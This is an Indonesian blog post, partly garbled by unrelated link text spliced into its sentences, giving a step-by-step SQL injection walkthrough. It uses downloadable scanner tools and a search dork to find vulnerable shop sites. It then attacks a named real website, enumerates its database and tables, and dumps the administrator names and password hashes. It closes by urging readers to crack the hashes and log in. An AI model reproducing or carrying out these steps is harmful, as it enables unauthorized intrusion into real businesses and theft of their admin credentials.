SQL Injection – Menggunakan Tools

Tool yangPengumuman Calon Asisten Praktikum Basisdata. Read more ... » anda butuhkan untukCara mengatasi Install DotNet 3.5 Windows 8. Read more ... » mempelajari teknik SQL InjectionHavij 1.3 Pro Full Version. Read more ... » dibawah ini adalah

[-]Reiluke SQL Injection/XXS/RFI/LFI scanner
Download

Reiluke SQLi helper Vers 2.7
Download

Sebagai percobaan, kitaCara Mudah Compilasi File Java. Read more ... » gunakan kelemahan sql injection pada website yang menggunakan produk
CMS The iceberg milik http://www.imagetraders.com.au denganTUGAS STRUKTUR DATA KELAS SAMI. Read more ... » Dork = details.phpMembuat deteksi Browser dengan PHP. Read more ... »?p_id= ‘Design & SEO by Image Traders Pty Ltd’ (baca thread : http://forum.xcode.or.id/viewtopic.php?f=99&t=39284 ).
jalankan Reiluke SQL Injection/XXS/RFI/LFI scanner dan masukkan dork tersebut.

Scan SQL

Tunggu beberapa saat dan kemudian ditemukan 112 web yang akan di testJquery Validasi Angka, Huruf dan Email. Read more ... » bug sqli

Klik “Test Sites” dan tunggu proses scanning

Test Sql Injection

Di kolom Vulnerable List akan menampilkan sejumlah website yang bisa diijeksi dengan script racun SQL

Mari kita coba ekploitasi salahJquery Validasi Angka, Huruf dan Email. Read more ... » satu website tersebut. Jalankan Reiluke SQLi helper Vers 2.7 dan sebagai percobaan adalah http://www.kincclothing.com/goods.php?p_id=41. Klik “Inject” dan tunggu beberapa saat.

Sql Injection

Get Server Info

Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns

No. of columns : 4
Check No. of Columns – finished
Looking for larget text visible column
Col num 1 found
Check if supports union

Check if supports union – finished
Check Current user
Check Current user – finished
Check if database version

Check if database version – finished
Check Current Database
Check current database – finished
Checking LoadFile
Check Load File – finished

Mysql version 5 OK – Please Get Database
Tool ini mendeteksi bahwa website tersebut bisa di-injeksi. kita bisa mendapatkan informasi lebih mendalam dari website tsb. sekarang klik ‘Get database’ untuk mendapatkan informasi database website tsb.

SQL injection

[1] Setelah muncul information_schema dan database dengan nama : kincc2_zc1 ,
[2] Arahkan Mouse dan pilih kincc2_zc1 lalu klik ‘Get Tables’ dan kemudian strukturTUGAS STRUKTUR DATA KELAS SAMI. Read more ... » tabel dalamCara mengatasai Cannot modify header PHP. Read more ... » database tersebut akan didapatkan sbb:
zen_admin
users
zen_address_book
zen_address_format
zen_admin
zen_admin_activity_log
zen_authorizenet
zen_banners
zen_banners_history
zen_categories
zen_categories_description
zen_configuration
zen_configuration_group
zen_counter
zen_counter_history
zen_countries
zen_coupon_email_track
zen_coupon_gv_customer
zen_coupon_gv_queue
zen_coupon_redeem_track
zen_coupon_restrict
zen_coupons
zen_coupons_description
zen_currencies
zen_customers
zen_customers_basket
zen_customers_basket_attributes
zen_customers_info
zen_customers_wishlist
zen_db_cache
zen_email_archive
zen_ezpages
zen_featured
zen_files_uploaded
zen_geo_zones
zen_get_terms_to_filter
zen_group_pricing
zen_languages
zen_layout_boxes
zen_manufacturers
zen_manufacturers_info
zen_media_clips
zen_media_manager
zen_media_to_products
zen_media_types
zen_meta_tags_categories_description
zen_meta_tags_products_description
zen_music_genre
zen_newsletters
zen_orders
zen_orders_products
zen_orders_products_attributes
zen_orders_products_download
zen_orders_status
zen_orders_status_history
zen_orders_total
zen_paypal
zen_paypal_payment_status
zen_paypal_payment_status_history
zen_paypal_session
zen_product_music_extra
zen_product_type_layout
zen_product_types
zen_product_types_to_category
zen_products
zen_products_attributes
zen_products_attributes_download
zen_products_description
zen_products_discount_quantity
zen_products_notifications
zen_products_options
zen_products_options_types
zen_products_options_values
zen_products_options_values_to_products_options
zen_products_to_categories
zen_project_version
zen_project_version_history
zen_query_builder
zen_record_artists
zen_record_artists_info
zen_record_company
zen_record_company_info
zen_reviews
zen_reviews_description
zen_salemaker_sales
zen_sessions
zen_specials
zen_tax_class
zen_tax_rates
zen_template_select
zen_upgrade_exceptions
zen_whos_online
zen_zones
zen_zones_to_geo_zones
[3] Setelah Tabel diatas muncul. pilih tabel Zen_admin dan klik ‘Get Columns’ untuk mendapatkan informasi kolom pada tabel tsb. anda akan mendapatkan kolom :
admin_name
admin_email
admin_pass
admin_level
Kolom diatas berisi informasi admin login dan password.

Sql Injection

[4]Blok keempat kolom tsb: admin_name, admin_email, admin_pass, admin_level dan klik ‘Dump Now’
Admin beserta Password akan anda dapatkan dalam bentuk Hash yang telah dienkripsi.

yang perlu anda lanjutkan sendiri adalah mencrack enkripsi tersebut, kemudian menemukan halaman login dan masuk ke website.

Selamat berusaha

Sumber : http://Xcode.or.id/

Posted in Hacking, PHP & mySQL, Security and tagged .